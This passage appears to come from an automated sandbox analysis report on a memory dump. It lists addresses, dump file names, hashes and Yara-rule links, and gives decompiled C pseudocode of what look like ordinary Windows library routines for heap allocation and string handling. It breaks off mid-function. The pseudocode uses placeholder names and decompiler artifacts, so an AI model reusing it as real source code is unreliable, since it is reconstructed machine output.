                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120d6a
                                                                                                                                                    0x03120d7b
                                                                                                                                                    0x03120d7f
                                                                                                                                                    0x03120d81
                                                                                                                                                    0x03120d84
                                                                                                                                                    0x03120d95
                                                                                                                                                    0x03120d95
                                                                                                                                                    0x03120d6c
                                                                                                                                                    0x03120d71
                                                                                                                                                    0x03120d71
                                                                                                                                                    0x03120d9a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c524a
                                                                                                                                                    0x030c524a
                                                                                                                                                    0x030c5250
                                                                                                                                                    0x03120d24
                                                                                                                                                    0x03120d35
                                                                                                                                                    0x03120d39
                                                                                                                                                    0x03120d3b
                                                                                                                                                    0x03120d3e
                                                                                                                                                    0x03120d50
                                                                                                                                                    0x03120d50
                                                                                                                                                    0x03120d26
                                                                                                                                                    0x03120d2b
                                                                                                                                                    0x03120d2b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120d55
                                                                                                                                                    0x030c5256
                                                                                                                                                    0x030c525b
                                                                                                                                                    0x030c5265
                                                                                                                                                    0x03120da7
                                                                                                                                                    0x030c526b
                                                                                                                                                    0x030c526e
                                                                                                                                                    0x030c5272
                                                                                                                                                    0x03120db1
                                                                                                                                                    0x03120db4
                                                                                                                                                    0x03120dc5
                                                                                                                                                    0x03120dc5
                                                                                                                                                    0x030c5272
                                                                                                                                                    0x030c5278
                                                                                                                                                    0x030c527e
                                                                                                                                                    0x030c528a
                                                                                                                                                    0x030c528c
                                                                                                                                                    0x030c528d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5280
                                                                                                                                                    0x030c5282
                                                                                                                                                    0x030c5288
                                                                                                                                                    0x030c529f
                                                                                                                                                    0x030c5292
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5292
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5288
                                                                                                                                                    0x030c527e

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa3b458184845d0f0157fca9fffa8a94e76d970bc69a93aa5d84f61f476fdbe0
                                                                                                                                                    • Instruction ID: f8014a72da3357bf254904675c5031bbee5209142572896b9e96fbf1f78e30a4
                                                                                                                                                    • Opcode Fuzzy Hash: fa3b458184845d0f0157fca9fffa8a94e76d970bc69a93aa5d84f61f476fdbe0
                                                                                                                                                    • Instruction Fuzzy Hash: 67310335253754AFC725EB29CC80B6ABBA5FF49760F154B1AE4550F1E1EB60F810C690
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FA61C, Relevance: .1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E030FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x31a0220);
				E0311D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x31b7b9c; // 0x0
				_t55 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0311D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x31b7b10 =  *0x31b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x31b536c; // 0x842110
					if( *_t51 != 0x31b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x31b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x31b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E030FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                                                                    0x030fa61c
                                                                                                                                                    0x030fa61e
                                                                                                                                                    0x030fa623
                                                                                                                                                    0x030fa628
                                                                                                                                                    0x030fa62b
                                                                                                                                                    0x030fa62d
                                                                                                                                                    0x030fa648
                                                                                                                                                    0x030fa64a
                                                                                                                                                    0x030fa64f
                                                                                                                                                    0x03139b44
                                                                                                                                                    0x030fa6ec
                                                                                                                                                    0x030fa6f1
                                                                                                                                                    0x030fa6f1
                                                                                                                                                    0x030fa655
                                                                                                                                                    0x030fa657
                                                                                                                                                    0x030fa65a
                                                                                                                                                    0x030fa65d
                                                                                                                                                    0x030fa662
                                                                                                                                                    0x030fa663
                                                                                                                                                    0x030fa667
                                                                                                                                                    0x030fa668
                                                                                                                                                    0x030fa66d
                                                                                                                                                    0x030fa706
                                                                                                                                                    0x030fa706
                                                                                                                                                    0x03139bda
                                                                                                                                                    0x03139be6
                                                                                                                                                    0x03139beb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139beb
                                                                                                                                                    0x030fa679
                                                                                                                                                    0x03139b7a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139b7a
                                                                                                                                                    0x030fa683
                                                                                                                                                    0x030fa6f4
                                                                                                                                                    0x030fa6f7
                                                                                                                                                    0x030fa6f9
                                                                                                                                                    0x030fa6fd
                                                                                                                                                    0x030fa6a0
                                                                                                                                                    0x030fa6a0
                                                                                                                                                    0x030fa6ad
                                                                                                                                                    0x030fa6af
                                                                                                                                                    0x030fa6b4
                                                                                                                                                    0x03139ba7
                                                                                                                                                    0x03139bac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139bc6
                                                                                                                                                    0x03139bce
                                                                                                                                                    0x03139bd1
                                                                                                                                                    0x03139bd3
                                                                                                                                                    0x03139bd3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139bd1
                                                                                                                                                    0x030fa6bd
                                                                                                                                                    0x030fa6c3
                                                                                                                                                    0x030fa6c6
                                                                                                                                                    0x030fa6d2
                                                                                                                                                    0x030fa701
                                                                                                                                                    0x030fa704
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa704
                                                                                                                                                    0x030fa6d4
                                                                                                                                                    0x030fa6d6
                                                                                                                                                    0x030fa6d9
                                                                                                                                                    0x030fa6db
                                                                                                                                                    0x030fa6e1
                                                                                                                                                    0x030fa6e6
                                                                                                                                                    0x030fa6e8
                                                                                                                                                    0x030fa6e8
                                                                                                                                                    0x030fa6ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa6ea
                                                                                                                                                    0x030fa688
                                                                                                                                                    0x030fa692
                                                                                                                                                    0x030fa694
                                                                                                                                                    0x030fa699
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa69d
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1f6076d4ff029fabdda54ec42aba5183e597ed9e6d9d0ef26130a51d3a96d429
                                                                                                                                                    • Instruction ID: 7a0b85dd9db88adb2537dad556aa7a4ac80f1481235d0e7c5bbd6175ba3f954f
                                                                                                                                                    • Opcode Fuzzy Hash: 1f6076d4ff029fabdda54ec42aba5183e597ed9e6d9d0ef26130a51d3a96d429
                                                                                                                                                    • Instruction Fuzzy Hash: 1C414979A01305DFCB08CF58D890B9ABBF1BF8D300F1980A9E908AB744D774A941CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03103D43, Relevance: .1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E03103D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E030D7B60(0, _t61, 0x30a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E030D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L030E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                                    0x03103d4c
                                                                                                                                                    0x03103d50
                                                                                                                                                    0x03103d55
                                                                                                                                                    0x03103d5e
                                                                                                                                                    0x0313e79a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313e79a
                                                                                                                                                    0x03103d68
                                                                                                                                                    0x0313e789
                                                                                                                                                    0x03103d9d
                                                                                                                                                    0x03103da3
                                                                                                                                                    0x03103daf
                                                                                                                                                    0x03103db5
                                                                                                                                                    0x03103dbc
                                                                                                                                                    0x03103dc4
                                                                                                                                                    0x03103dc9
                                                                                                                                                    0x03103dce
                                                                                                                                                    0x0313e7ae
                                                                                                                                                    0x0313e7ae
                                                                                                                                                    0x03103dde
                                                                                                                                                    0x03103de2
                                                                                                                                                    0x03103de7
                                                                                                                                                    0x03103e0d
                                                                                                                                                    0x03103e13
                                                                                                                                                    0x03103e16
                                                                                                                                                    0x03103e1e
                                                                                                                                                    0x03103e25
                                                                                                                                                    0x03103e28
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103e2a
                                                                                                                                                    0x03103e2f
                                                                                                                                                    0x03103e37
                                                                                                                                                    0x03103e37
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103e37
                                                                                                                                                    0x03103e31
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103e31
                                                                                                                                                    0x03103e20
                                                                                                                                                    0x03103e20
                                                                                                                                                    0x03103e35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103de9
                                                                                                                                                    0x03103de9
                                                                                                                                                    0x03103de9
                                                                                                                                                    0x03103dee
                                                                                                                                                    0x03103dfd
                                                                                                                                                    0x03103dff
                                                                                                                                                    0x03103e02
                                                                                                                                                    0x03103e05
                                                                                                                                                    0x03103e05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103df0
                                                                                                                                                    0x03103de7
                                                                                                                                                    0x0313e78f
                                                                                                                                                    0x0313e794
                                                                                                                                                    0x03103d79
                                                                                                                                                    0x03103d84
                                                                                                                                                    0x03103d89
                                                                                                                                                    0x03103d8e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313e7a4
                                                                                                                                                    0x03103d96
                                                                                                                                                    0x03103d9a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103d9a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313e794
                                                                                                                                                    0x03103d6e
                                                                                                                                                    0x03103d73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313e7b5
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5510b0debda39284fa6ef7f6862a84a975d727ca8efc13df89c2cd20fa4b444b
                                                                                                                                                    • Instruction ID: 5c49e2b95edfddd87c2d42726ec4b56da0218f10ce3cb64a1d67f06d11190706
                                                                                                                                                    • Opcode Fuzzy Hash: 5510b0debda39284fa6ef7f6862a84a975d727ca8efc13df89c2cd20fa4b444b
                                                                                                                                                    • Instruction Fuzzy Hash: FD31A43A605615DFC729CF2DC841A7BBBF5EF4971074A886AE465CB390E7B0D880C7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EC182, Relevance: .1, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E030EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E030E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03198D34(_v8, _t80);
					}
					E030E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E030DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03198833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E030DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0310B180();
						if(_a4 != 0) {
							E030E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E030EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E030EBB2D(_t16, _t15);
						E030EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E030DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E030DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E030DFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                                    0x030ec18d
                                                                                                                                                    0x030ec18f
                                                                                                                                                    0x030ec191
                                                                                                                                                    0x030ec19b
                                                                                                                                                    0x030ec1a0
                                                                                                                                                    0x030ec1d4
                                                                                                                                                    0x030ec1de
                                                                                                                                                    0x03132d6e
                                                                                                                                                    0x030ec1e4
                                                                                                                                                    0x030ec1e4
                                                                                                                                                    0x030ec1e4
                                                                                                                                                    0x030ec1ec
                                                                                                                                                    0x03132d7d
                                                                                                                                                    0x03132d7d
                                                                                                                                                    0x030ec1f3
                                                                                                                                                    0x030ec1ff
                                                                                                                                                    0x03132d88
                                                                                                                                                    0x03132d8d
                                                                                                                                                    0x03132d94
                                                                                                                                                    0x03132d94
                                                                                                                                                    0x03132d9f
                                                                                                                                                    0x03132da4
                                                                                                                                                    0x03132dab
                                                                                                                                                    0x03132db0
                                                                                                                                                    0x03132db2
                                                                                                                                                    0x03132db3
                                                                                                                                                    0x03132db4
                                                                                                                                                    0x03132dbc
                                                                                                                                                    0x03132dc3
                                                                                                                                                    0x03132dc3
                                                                                                                                                    0x030ec205
                                                                                                                                                    0x030ec205
                                                                                                                                                    0x030ec208
                                                                                                                                                    0x030ec20e
                                                                                                                                                    0x030ec211
                                                                                                                                                    0x030ec216
                                                                                                                                                    0x030ec219
                                                                                                                                                    0x030ec21f
                                                                                                                                                    0x030ec222
                                                                                                                                                    0x030ec22c
                                                                                                                                                    0x030ec234
                                                                                                                                                    0x030ec23a
                                                                                                                                                    0x030ec23f
                                                                                                                                                    0x030ec245
                                                                                                                                                    0x030ec24b
                                                                                                                                                    0x030ec251
                                                                                                                                                    0x030ec25a
                                                                                                                                                    0x030ec276
                                                                                                                                                    0x030ec27d
                                                                                                                                                    0x030ec27d
                                                                                                                                                    0x030ec25c
                                                                                                                                                    0x030ec25c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ec25e
                                                                                                                                                    0x030ec1a4
                                                                                                                                                    0x030ec1aa
                                                                                                                                                    0x030ec1b3
                                                                                                                                                    0x030ec265
                                                                                                                                                    0x030ec26c
                                                                                                                                                    0x030ec26c
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                    • Instruction ID: 5af61ef9018d2d2de0274b6463626c70830efa7f354d408219963619c6d2d5a1
                                                                                                                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                    • Instruction Fuzzy Hash: 1B31097670674ABFE704EBB4C880BE9F798BF86204F08819ED41C5F201DB755946C7A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03147016, Relevance: .1, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E03147016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x31bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03146B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03146B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E030E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03109AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0310B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L030E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                                    0x03147016
                                                                                                                                                    0x0314701e
                                                                                                                                                    0x0314702b
                                                                                                                                                    0x03147033
                                                                                                                                                    0x03147037
                                                                                                                                                    0x0314703c
                                                                                                                                                    0x0314703e
                                                                                                                                                    0x03147041
                                                                                                                                                    0x03147045
                                                                                                                                                    0x0314704a
                                                                                                                                                    0x03147050
                                                                                                                                                    0x03147055
                                                                                                                                                    0x0314705a
                                                                                                                                                    0x03147062
                                                                                                                                                    0x03147062
                                                                                                                                                    0x0314705a
                                                                                                                                                    0x03147064
                                                                                                                                                    0x03147064
                                                                                                                                                    0x03147067
                                                                                                                                                    0x03147071
                                                                                                                                                    0x03147096
                                                                                                                                                    0x0314709b
                                                                                                                                                    0x031470a2
                                                                                                                                                    0x031470a6
                                                                                                                                                    0x031470a7
                                                                                                                                                    0x031470ad
                                                                                                                                                    0x031470b3
                                                                                                                                                    0x031470b6
                                                                                                                                                    0x031470bb
                                                                                                                                                    0x031470c3
                                                                                                                                                    0x031470c3
                                                                                                                                                    0x031470c6
                                                                                                                                                    0x031470cd
                                                                                                                                                    0x031470dd
                                                                                                                                                    0x031470e0
                                                                                                                                                    0x031470e2
                                                                                                                                                    0x031470e2
                                                                                                                                                    0x031470ee
                                                                                                                                                    0x03147101
                                                                                                                                                    0x031470f0
                                                                                                                                                    0x031470f9
                                                                                                                                                    0x031470f9
                                                                                                                                                    0x0314710a
                                                                                                                                                    0x0314710e
                                                                                                                                                    0x03147112
                                                                                                                                                    0x03147117
                                                                                                                                                    0x03147118
                                                                                                                                                    0x03147118
                                                                                                                                                    0x031470bb
                                                                                                                                                    0x0314711d
                                                                                                                                                    0x03147123
                                                                                                                                                    0x03147131
                                                                                                                                                    0x03147131
                                                                                                                                                    0x03147136
                                                                                                                                                    0x0314713d
                                                                                                                                                    0x0314713e
                                                                                                                                                    0x0314713f
                                                                                                                                                    0x0314714a
                                                                                                                                                    0x0314714a
                                                                                                                                                    0x03147084
                                                                                                                                                    0x03147088
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0314708e
                                                                                                                                                    0x0314708e
                                                                                                                                                    0x03147092
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03147092

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 40e8f151e55c814b2c847554e235112a72ab5a26a1be15b0580f9fad5e66eaa6
                                                                                                                                                    • Instruction ID: b31e329d55408a03f2e7e3b2fc38c2f151779c5b1913116d70944088eee1673d
                                                                                                                                                    • Opcode Fuzzy Hash: 40e8f151e55c814b2c847554e235112a72ab5a26a1be15b0580f9fad5e66eaa6
                                                                                                                                                    • Instruction Fuzzy Hash: DF31C6766057519FC325DF28C840A6AB3E5FFCCB00F044A29F8A59B6D0E730E904C7A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03173D40, Relevance: .1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E03173D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x31bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E030E2280(_t34, 0x31b8a6c);
